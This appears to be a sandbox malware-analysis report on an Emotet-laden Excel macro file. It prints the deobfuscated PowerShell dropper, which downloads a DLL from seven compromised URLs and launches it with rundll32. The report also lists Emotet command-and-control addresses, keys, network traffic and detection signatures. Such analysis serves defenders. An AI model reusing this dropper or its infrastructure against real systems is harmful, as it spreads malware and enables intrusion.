Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Resubmissions

24/11/2021, 17:59 UTC

211124-wk8rgsddbm 10

22/11/2021, 14:46 UTC

211122-r5n6csagd6 10

22/11/2021, 14:46 UTC

211122-r5csbsfgdp 10

22/11/2021, 14:44 UTC

211122-r4kfsafgdn 10

22/11/2021, 14:41 UTC

211122-r2x9vsfgcq 10

22/11/2021, 14:20 UTC

211122-rneklaffgr 10

22/11/2021, 14:15 UTC

211122-rkk8zaffgl 10

17/11/2021, 06:51 UTC

211117-hm1l1aeefm 10

17/11/2021, 06:37 UTC

211117-hdnk3seedn 10

Analysis

  • max time kernel
    21s
  • max time network
    21s
  • platform
    windows10_x64
  • resource
    win10-en-20211104
  • submitted
    22/11/2021, 14:46 UTC

General

  • Target

    865663204559_17_Nov_2021.xlsm

  • Size

    44KB

  • MD5

    477fd718bb764ffe3c5afde16c6c8dd2

  • SHA1

    eb932e19d95f88d64270d40cdc0b92c6d1cf63be

  • SHA256

    ee880ebdf26a1bcebe70a7ba17659199833c6107d758e26d37502bed9a225ee3

  • SHA512

    f7d0451ca3670179cc93a680b99f8982204c43054c55eb479c38dc8ea0ba6ba5b6ebea4508569091c07d95a759841455605e6daeab445146b29fc1af377ba267

Malware Config

Extracted

Language
ps1
Deobfuscated
1
$dfkj = $strs = "https://evgeniys.ru/sap-logs/D6/", "http://crownadvertising.ca/wp-includes/OxiAACCoic/", "https://cars-taxonomy.mywebartist.eu/-/BPCahsAFjwF/", "http://immoinvest.com.br/blog_old/wp-admin/luoT/", "https://yoho.love/wp-content/e4laFBDXIvYT6O/", "https://www.168801.xyz/wp-content/6J3CV4meLxvZP/", "https://www.pasionportufuturo.pe/wp-content/XUBS/"
2
foreach ($st in $strs) {
3
$r1 = get-random
4
$r2 = get-random
5
$tpth = "C:\\ProgramData\\\\" + $r1 + ".dll"
6
invoke-webrequest -uri $st -outfile $tpth
7
if (test-path $tpth) {
8
$fp = "C:\\Windows\\SysWow64\\rundll32.exe"
9
$a = $tpth + ",f" + $r2
10
start-process "C:\\Windows\\SysWow64\\rundll32.exe" -argumentlist $a
11
break
12
}
13
}
14
invoke-expression $dfkj
15
URLs
exe.dropper

https://evgeniys.ru/sap-logs/D6/

exe.dropper

http://crownadvertising.ca/wp-includes/OxiAACCoic/

exe.dropper

https://cars-taxonomy.mywebartist.eu/-/BPCahsAFjwF/

exe.dropper

http://immoinvest.com.br/blog_old/wp-admin/luoT/

exe.dropper

https://yoho.love/wp-content/e4laFBDXIvYT6O/

exe.dropper

https://www.168801.xyz/wp-content/6J3CV4meLxvZP/

exe.dropper

https://www.pasionportufuturo.pe/wp-content/XUBS/

Extracted

Family

emotet

Botnet

Epoch4

C2

91.200.186.228:443

191.252.196.221:8080

94.177.248.64:443

66.42.55.5:7080

103.8.26.103:8080

185.184.25.237:8080

103.8.26.102:8080

178.79.147.66:8080

58.227.42.236:80

45.118.135.203:7080

103.75.201.2:443

195.154.133.20:443

45.142.114.231:8080

212.237.5.209:443

207.38.84.195:8080

104.251.214.46:8080

212.237.17.99:8080

212.237.56.116:7080

216.158.226.206:443

110.232.117.186:8080

eck1.plain
1
-----BEGIN PUBLIC KEY-----
2
MFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAE86M1tQ4uK/Q1Vs0KTCk+fPEQ3cuw
3
TyCz+gIgzky2DB5Elr60DubJW5q9Tr2dj8/gEFs0TIIEJgLTuqzx+58sdg==
4
-----END PUBLIC KEY-----
ecs1.plain
1
-----BEGIN PUBLIC KEY-----
2
MFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAEQF90tsTY3Aw9HwZ6N9y5+be9Xoov
3
pqHyD6F5DRTl9THosAoePIs/e5AdJiYxhmV8Gq3Zw1ysSPBghxjZdDxY+Q==
4
-----END PUBLIC KEY-----

Signatures

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • suricata: ET MALWARE ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex/Trickbot CnC)

    suricata: ET MALWARE ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex/Trickbot CnC)

  • suricata: ET MALWARE W32/Emotet CnC Beacon 3

    suricata: ET MALWARE W32/Emotet CnC Beacon 3

  • Blocklisted process makes network request 3 IoCs
  • Downloads MZ/PE file
  • Loads dropped DLL 2 IoCs
  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\865663204559_17_Nov_2021.xlsm"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4024
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"https://evgeniys.ru/sap-logs/D6/,http://crownadvertising.ca/wp-includes/OxiAACCoic/,https://cars-taxonomy.mywebartist.eu/-/BPCahsAFjwF/,http://immoinvest.com.br/blog_old/wp-admin/luoT/,https://yoho.love/wp-content/e4laFBDXIvYT6O/,https://www.168801.xyz/wp-content/6J3CV4meLxvZP/,https://www.pasionportufuturo.pe/wp-content/XUBS/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:1868
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell $dfkj="$strs=\"https://evgeniys.ru/sap-logs/D6/,http://crownadvertising.ca/wp-includes/OxiAACCoic/,https://cars-taxonomy.mywebartist.eu/-/BPCahsAFjwF/,http://immoinvest.com.br/blog_old/wp-admin/luoT/,https://yoho.love/wp-content/e4laFBDXIvYT6O/,https://www.168801.xyz/wp-content/6J3CV4meLxvZP/,https://www.pasionportufuturo.pe/wp-content/XUBS/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2416
        • C:\Windows\SysWow64\rundll32.exe
          "C:\Windows\SysWow64\rundll32.exe" C:\ProgramData\2082074918.dll,f256876290
          4⤵
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:1808
          • C:\Windows\SysWOW64\rundll32.exe
            C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\2082074918.dll",Control_RunDLL
            5⤵
            • Loads dropped DLL
            • Drops file in System32 directory
            • Suspicious use of WriteProcessMemory
            PID:680
            • C:\Windows\SysWOW64\rundll32.exe
              C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Bxachutoyjs\unzedrunujmobju.rov",QnYEvEaWkGYXF
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:1516
              • C:\Windows\SysWOW64\rundll32.exe
                C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Bxachutoyjs\unzedrunujmobju.rov",Control_RunDLL
                7⤵
                • Blocklisted process makes network request
                • Suspicious behavior: EnumeratesProcesses
                PID:3188

Network

  • flag-us
    DNS
    time.windows.com
    Remote address:
    8.8.8.8:53
    Request
    time.windows.com
    IN A
    Response
    time.windows.com
    IN CNAME
    twc.trafficmanager.net
    twc.trafficmanager.net
    IN A
    40.119.148.38
  • flag-us
    DNS
    evgeniys.ru
    powershell.exe
    Remote address:
    8.8.8.8:53
    Request
    evgeniys.ru
    IN A
    Response
    evgeniys.ru
    IN A
    159.253.18.185
  • flag-us
    DNS
    crownadvertising.ca
    powershell.exe
    Remote address:
    8.8.8.8:53
    Request
    crownadvertising.ca
    IN A
    Response
    crownadvertising.ca
    IN A
    209.124.90.7
  • flag-us
    GET
    http://crownadvertising.ca/wp-includes/OxiAACCoic/
    powershell.exe
    Remote address:
    209.124.90.7:80
    Request
    GET /wp-includes/OxiAACCoic/ HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.15063.0
    Host: crownadvertising.ca
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Date: Mon, 22 Nov 2021 14:52:51 GMT
    Server: Apache
    Cache-Control: no-cache, must-revalidate
    Pragma: no-cache
    Expires: Mon, 22 Nov 2021 14:52:51 GMT
    Content-Disposition: attachment; filename="aoSbYZ.dll"
    Content-Transfer-Encoding: binary
    Set-Cookie: 619baec372a01=1637592771; expires=Mon, 22-Nov-2021 14:53:51 GMT; Max-Age=60; path=/
    Upgrade: h2,h2c
    Connection: Upgrade, Keep-Alive
    Last-Modified: Mon, 22 Nov 2021 14:52:51 GMT
    Keep-Alive: timeout=5, max=100
    Transfer-Encoding: chunked
    Content-Type: application/x-msdownload
  • flag-pl
    GET
    https://91.200.186.228/YqsbUCnLRVkcHeu
    rundll32.exe
    Remote address:
    91.200.186.228:443
    Request
    GET /YqsbUCnLRVkcHeu HTTP/1.1
    Cookie: CHeeBoZsSXJd=D2SVt9gbcJ2TNRE279N5LPJT41jGL11LYgJx07BajJldlUc5+W/yQGRsI3wl+tjiJ6nuwYuPWTkPAlLFqSJvlK9a7Q0tC8LVdmtksORbgViB+IEt3Am1ZGtIMvkAMGOAd0kLjGyJwydfR9TbAnEIjFRazN9AJhHg0TuI1glUGsVBW0VallnnvdzHYMpFeHl6O/M11V9P2gkjgQTjw9Se8ADDGQ/gyf+/kapZ4cMJYyH+wjgUUMWR6ZHj
    Host: 91.200.186.228
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Mon, 22 Nov 2021 14:46:39 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
  • 52.109.8.20:443
    322 B
    7
  • 159.253.18.185:443
    evgeniys.ru
    tls
    powershell.exe
    668 B
    5.0kB
    9
    8
  • 209.124.90.7:80
    http://crownadvertising.ca/wp-includes/OxiAACCoic/
    http
    powershell.exe
    4.8kB
    266.7kB
    100
    186

    HTTP Request

    GET http://crownadvertising.ca/wp-includes/OxiAACCoic/

    HTTP Response

    200
  • 91.200.186.228:443
    https://91.200.186.228/YqsbUCnLRVkcHeu
    tls, http
    rundll32.exe
    1.0kB
    2.6kB
    8
    7

    HTTP Request

    GET https://91.200.186.228/YqsbUCnLRVkcHeu

    HTTP Response

    200
  • 8.8.8.8:53
    time.windows.com
    dns
    62 B
    114 B
    1
    1

    DNS Request

    time.windows.com

    DNS Response

    40.119.148.38

  • 40.119.148.38:123
    time.windows.com
    ntp
    76 B
    1
  • 8.8.8.8:53
    evgeniys.ru
    dns
    powershell.exe
    57 B
    73 B
    1
    1

    DNS Request

    evgeniys.ru

    DNS Response

    159.253.18.185

  • 8.8.8.8:53
    crownadvertising.ca
    dns
    powershell.exe
    65 B
    81 B
    1
    1

    DNS Request

    crownadvertising.ca

    DNS Response

    209.124.90.7

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/1808-359-0x0000000010000000-0x0000000010028000-memory.dmp

    Filesize

    160KB

  • memory/2416-299-0x000002364D503000-0x000002364D505000-memory.dmp

    Filesize

    8KB

  • memory/2416-300-0x000002364D506000-0x000002364D508000-memory.dmp

    Filesize

    8KB

  • memory/2416-333-0x000002364D508000-0x000002364D509000-memory.dmp

    Filesize

    4KB

  • memory/2416-298-0x000002364D500000-0x000002364D502000-memory.dmp

    Filesize

    8KB

  • memory/4024-118-0x00007FF7F8C10000-0x00007FF7F8C20000-memory.dmp

    Filesize

    64KB

  • memory/4024-132-0x00007FF7F5D90000-0x00007FF7F5DA0000-memory.dmp

    Filesize

    64KB

  • memory/4024-125-0x000001CDE3620000-0x000001CDE3622000-memory.dmp

    Filesize

    8KB

  • memory/4024-124-0x000001CDE3620000-0x000001CDE3622000-memory.dmp

    Filesize

    8KB

  • memory/4024-123-0x000001CDE3620000-0x000001CDE3622000-memory.dmp

    Filesize

    8KB

  • memory/4024-122-0x00007FF7F8C10000-0x00007FF7F8C20000-memory.dmp

    Filesize

    64KB

  • memory/4024-121-0x00007FF7F8C10000-0x00007FF7F8C20000-memory.dmp

    Filesize

    64KB

  • memory/4024-120-0x00007FF7F8C10000-0x00007FF7F8C20000-memory.dmp

    Filesize

    64KB

  • memory/4024-119-0x00007FF7F8C10000-0x00007FF7F8C20000-memory.dmp

    Filesize

    64KB

  • memory/4024-131-0x00007FF7F5D90000-0x00007FF7F5DA0000-memory.dmp

    Filesize

    64KB

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.